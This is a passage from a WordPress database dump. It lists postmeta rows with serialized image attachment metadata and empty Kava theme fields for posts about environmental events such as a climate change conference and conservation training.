file\";s:25:\"Joint-meeting-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32705,4691,'_wp_old_date','2022-05-09'),(32706,4691,'_thumbnail_id','4692'),(32707,4694,'_edit_lock','1652099007:42'),(32708,4694,'_last_editor_used_jetpack','block-editor'),(32709,4695,'_wp_attached_file','2022/05/Climate-Change-Conference.png'),(32710,4695,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:37:\"2022/05/Climate-Change-Conference.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:36:\"Climate-Change-Conference-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:37:\"Climate-Change-Conference-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32713,4694,'_wp_old_date','2022-05-09'),(32714,4694,'_thumbnail_id','4695'),(32715,4694,'_edit_last','42'),(32718,4694,'kava_extra_enable_breadcrumbs','inherit'),(32719,4694,'post_formats',''),(32720,4694,'gallery_tab',''),(32721,4694,'kava_extra_gallery_images',''),(32722,4694,'link_tab',''),(32723,4694,'kava_extra_link',''),(32724,4694,'kava_extra_link_target','_blank'),(32725,4694,'quote_tab',''),(32726,4694,'kava_extra_quote_text',''),(32727,4694,'kava_extra_quote_cite',''),(32728,4694,'audio_tab',''),(32729,4694,'kava_extra_audio',''),(32730,4694,'kava_extra_audio_loop','false'),(32731,4694,'kava_extra_audio_autoplay','false'),(32732,4694,'kava_extra_audio_preload','false'),(32733,4694,'video_tab',''),(32734,4694,'kava_extra_video_type','library'),(32735,4694,'kava_extra_video_library',''),(32736,4694,'kava_extra_video_external',''),(32737,4694,'kava_extra_video_poster',''),(32738,4694,'kava_extra_video_width','770'),(32739,4694,'kava_extra_video_height','480'),(32740,4694,'kava_extra_video_loop','false'),(32741,4694,'kava_extra_video_autoplay','false'),(32742,4694,'kava_extra_video_preload','false'),(32743,4697,'_edit_lock','1652099435:42'),(32744,4697,'_last_editor_used_jetpack','block-editor'),(32745,4698,'_wp_attached_file','2022/05/conservation-training.png'),(32746,4698,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:33:\"2022/05/conservation-training.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"conservation-training-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"conservation-training-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"conservation-training-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"conservation-training-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:32:\"conservation-training-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:33:\"conservation-training-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:33:\"conservation-training-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:33:\"conservation-training-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:33:\"conservation-training-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:33:\"conservation-training-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:33:\"conservation-training-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32749,4697,'_wp_old_date','2022-05-09'),(32750,4697,'_thumbnail_id','4698'),(32751,4697,'_edit_last','42'),(32752,4697,'kava_extra_enable_breadcrumbs','inherit'),(32753,4697,'post_formats',''),(32754,4697,'gallery_tab',''),(32755,4697,'kava_extra_gallery_images',''),(32756,4697,'link_tab',''),(32757,4697,'kava_extra_link',''),(32758,4697,'kava_extra_link_target','_blank'),(32759,4697,'quote_tab',''),(32760,4697,'kava_extra_quote_text',''),(32761,4697,'kava_extra_quote_cite',''),(32762,4697,'audio_tab',''),(32763,4697,'kava_extra_audio',''),(32764,4697,'kava_extra_audio_loop','false'),(32765,4697,'kava_extra_audio_autoplay','false'),(32766,4697,'kava_extra_audio_preload','false'),(32767,4697,'video_tab',''),(32768,4697,'kava_extra_video_type','library'),(32769,4697,'kava_extra_video_library',''),(32770,4697,'kava_extra_video_external',''),(32771,4697,'kava_extra_video_poster',''),(32772,4697,'kava_extra_video_width','770'),(32773,4697,'kava_extra_video_height','480'),(32774,4697,'kava_extra_video_loop','false'),(32775,4697,'kava_extra_video_autoplay','false'),(32776,4697,'kava_extra_video_preload','false'),(32777,4700,'_edit_lock','1652111022:42'),(32778,4700,'_last_editor_used_jetpack','block-editor'),(32779,4701,'_wp_attached_file','2022/05/epa-giz.png'),(32780,4701,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2022/05/epa-giz.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"epa-giz-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"epa-giz-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"epa-giz-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"epa-giz-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:18:\"epa-giz-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:19:\"epa-giz-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:19:\"epa-giz-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:19:\"epa-giz-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:19:\"epa-giz-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:19:\"epa-giz-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:19:\"epa-giz-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32783,4700,'_wp_old_date','2022-05-09'),(32784,4700,'_thumbnail_id','4701'),(32785,4700,'_edit_last','42'),(32786,4700,'kava_extra_enable_breadcrumbs','inherit'),(32787,4700,'post_formats',''),(32788,4700,'gallery_tab',''),(32789,4700,'kava_extra_gallery_images',''),(32790,4700,'link_tab',''),(32791,4700,'kava_extra_link',''),(32792,4700,'kava_extra_link_target','_blank'),(32793,4700,'quote_tab',''),(32794,4700,'kava_extra_quote_text',''),(32795,4700,'kava_extra_quote_cite',''),(32796,4700,'audio_tab',''),(32797,4700,'kava_extra_audio',''),(32798,4700,'kava_extra_audio_loop','false'),(32799,4700,'kava_extra_audio_autoplay','false'),(32800,4700,'kava_extra_audio_preload','false'),(32801,4700,'video_tab',''),(32802,4700,'kava_extra_video_type','library'),(32803,4700,'kava_extra_video_library',''),(32804,4700,'kava_extra_video_external',''),(32805,4700,'kava_extra_video_poster',''),(32806,4700,'kava_extra_video_width','770'),(32807,4700,'kava_extra_video_height','480'),(32808,4700,'kava_extra_video_loop','false'),(32809,4700,'kava_extra_video_autoplay','false'),(32810,4700,'kava_extra_video_preload','false'),(32811,4703,'_edit_lock','1652111345:42'),(32812,4703,'_last_editor_used_jetpack','block-editor'),(32813,4704,'_wp_attached_file','2022/05/DED-.png'),(32814,4704,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/05/DED-.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"DED--300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"DED--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"DED--768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"DED--370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"DED--150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"DED--230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"DED--400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"DED--370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"DED--570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"DED--600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"DED--640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32817,4703,'_wp_old_date','2022-05-09'),(32818,4703,'_thumbnail_id','4704'),(32819,4703,'_edit_last','42'),(32820,4703,'kava_extra_enable_breadcrumbs','inherit'),(32821,4703,'post_formats',''),(32822,4703,'gallery_tab',''),(32823,4703,'kava_extra_gallery_images',''),(32824,4703,'link_tab',''),(32825,4703,'kava_extra_link',''),(32826,4703,'kava_extra_link_target','_blank'),(32827,4703,'quote_tab',''),(32828,4703,'kava_extra_quote_text',''),(32829,4703,'kava_extra_quote_cite',''),(32830,4703,'audio_tab',''),(32831,4703,'kava_extra_audio',''),(32832,4703,'kava_extra_audio_loop','false'),(32833,4703,'kava_extra_audio_autoplay','false'),(32834,4703,'kava_extra_audio_preload','false'),(32835,4703,'video_tab',''),(32836,4703,'kava_extra_video_type','library'),(32837,4703,'kava_extra_video_library',''),(32838,4703,'kava_extra_video_external',''),(32839,4703,'kava_extra_video_poster',''),(32840,4703,'kava_extra_video_width','770'),(32841,4703,'kava_extra_video_height','480'),(32842,4703,'kava_extra_video_loop','false'),(32843,4703,'kava_extra_video_autoplay','false'),(32844,4703,'kava_extra_video_preload','false'),(32845,4706,'_edit_lock','1652111598:42'),(32846,4706,'_last_editor_used_jetpack','block-editor'),(32847,4707,'_wp_attached_file','2022/05/validation-workshop.png'),(32848,4707,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:31:\"2022/05/validation-workshop.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"validation-workshop-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"validation-workshop-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"validation-workshop-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"validation-workshop-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:30:\"validation-workshop-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:31:\"validation-workshop-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:31:\"validation-workshop-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:31:\"validation-workshop-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:31:\"validation-workshop-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:31:\"validation-workshop-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:31:\"validation-workshop-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32851,4706,'_wp_old_date','2022-05-09'),(32852,4706,'_thumbnail_id','4707'),(32853,4706,'_edit_last','42'),(32854,4706,'kava_extra_enable_breadcrumbs','inherit'),(32855,4706,'post_formats',''),(32856,4706,'gallery_tab',''),(32857,4706,'kava_extra_gallery_images',''),(32858,4706,'link_tab',''),(32859,4706,'kava_extra_link',''),(32860,4706,'kava_extra_link_target','_blank'),(32861,4706,'quote_tab',''),(32862,4706,'kava_extra_quote_text',''),(32863,4706,'kava_extra_quote_cite',''),(32864,4706,'audio_tab',''),(32865,4706,'kava_extra_audio',''),(32866,4706,'kava_extra_audio_loop','false'),(32867,4706,'kava_extra_audio_autoplay','false'),(32868,4706,'kava_extra_audio_preload','false'),(32869,4706,'video_tab',''),(32870,4706,'kava_extra_video_type','library'),(32871,4706,'kava_extra_video_library',''),(32872,4706,'kava_extra_video_external',''),(32873,4706,'kava_extra_video_poster',''),(32874,4706,'kava_extra_video_width','770'),(32875,4706,'kava_extra_video_height','480'),(32876,4706,'kava_extra_video_loop','false'),(32877,4706,'kava_extra_video_autoplay','false'),(32878,4706,'kava_extra_video_preload','false'),(32879,4709,'_edit_lock','1652111910:42'),(32880,4709,'_last_editor_used_jetpack','block-editor'),(32881,4710,'_wp_attached_file','2022/05/epa-technicians.png'),(32882,4710,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:27:\"2022/05/epa-technicians.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"epa-technicians-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"epa-technicians-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"epa-technicians-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"epa-technicians-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:26:\"epa-technicians-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:27:\"epa-technicians-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:27:\"epa-technicians-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:27:\"epa-technicians-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:27:\"epa-technicians-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:27:\"epa-technicians-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:27:\"epa-technicians-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32885,4709,'_wp_old_date','2022-05-09'),(32886,4709,'_thumbnail_id','4710'),(32887,4709,'_edit_last','42'),(32888,4709,'kava_extra_enable_breadcrumbs','inherit'),(32889,4709,'post_formats',''),(32890,4709,'gallery_tab',''),(32891,4709,'kava_extra_gallery_images',''),(32892,4709,'link_tab',''),(32893,4709,'kava_extra_link',''),(32894,4709,'kava_extra_link_target','_blank'),(32895,4709,'quote_tab',''),(32896,4709,'kava_extra_quote_text',''),(32897,4709,'kava_extra_quote_cite',''),(32898,4709,'audio_tab',''),(32899,4709,'kava_extra_audio',''),(32900,4709,'kava_extra_audio_loop','false'),(32901,4709,'kava_extra_audio_autoplay','false'),(32902,4709,'kava_extra_audio_preload','false'),(32903,4709,'video_tab',''),(32904,4709,'kava_extra_video_type','library'),(32905,4709,'kava_extra_video_library',''),(32906,4709,'kava_extra_video_external',''),(32907,4709,'kava_extra_video_poster',''),(32908,4709,'kava_extra_video_width','770'),(32909,4709,'kava_extra_video_height','480'),(32910,4709,'kava_extra_video_loop','false'),(32911,4709,'kava_extra_video_autoplay','false'),(32912,4709,'kava_extra_video_preload','false'),(32913,4712,'_edit_lock','1652112880:42'),(32914,4712,'_last_editor_used_jetpack','block-editor'),(32915,4713,'_wp_attached_file','2022/05/Untitled.png'),(32916,4713,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2022/05/Untitled.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Untitled-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Untitled-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"Untitled-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"Untitled-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"Untitled-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:20:\"Untitled-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"Untitled-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:20:\"Untitled-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:20:\"Untitled-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32919,4712,'_wp_old_date','2022-05-09'),(32920,4712,'_thumbnail_id','4713'),(32921,4712,'_edit_last','42'),(32922,4712,'kava_extra_enable_breadcrumbs','inherit'),(32923,4712,'post_formats',''),(32924,4712,'gallery_tab',''),(32925,4712,'kava_extra_gallery_images',''),(32926,4712,'link_tab',''),(32927,4712,'kava_extra_link',''),(32928,4712,'kava_extra_link_target','_blank'),(32929,4712,'quote_tab',''),(32930,4712,'kava_extra_quote_text',''),(32931,4712,'kava_extra_quote_cite',''),(32932,4712,'audio_tab',''),(32933,4712,'kava_extra_audio',''),(32934,4712,